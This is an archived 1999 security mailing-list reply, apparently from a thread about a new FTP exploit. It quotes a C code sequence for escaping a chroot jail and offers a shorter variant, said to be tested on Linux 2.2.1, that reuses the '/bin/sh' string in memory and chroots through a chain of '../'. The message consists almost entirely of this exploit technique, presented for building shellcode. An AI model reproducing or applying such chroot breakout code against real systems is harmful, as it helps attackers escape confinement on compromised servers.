Re: another ftp exploit (fwd)

From: Artem Malyshev (artemat_private)
Date: Fri Mar 26 1999 - 04:08:25 PST

Next message: StudNo1: "Re: abuse of nickserv"

Previous message: danny: "Re: [Unet-Opers] abuse of nickserv (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> /* To break chroot we have to...
>
>    fd = open ( ".", O_RDONLY );
>    mkdir ( "hax0r", 0666 );
>    chroot ( "hax0r" );
>    fchdir ( fd );
>    for ( i = 0; i < 254; i++ )
>        chdir ( ".." );
>    chroot ( "." );
>
> */

Too complex for standart linux
All we have to do to break chroot is:

 mkdir("/sh");   // we already have string "/sh" in memory as a part of
		 // "/bin/sh"
 chroot("/sh");
 chroot("../../../../../../../../../"); // a number of "../" here,
					// I used 0x10

Last string can be built is stack with a simple loop
Tested on linux 2.2.1

 -am

Next message: StudNo1: "Re: abuse of nickserv"
Previous message: danny: "Re: [Unet-Opers] abuse of nickserv (fwd)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:40:09 PDT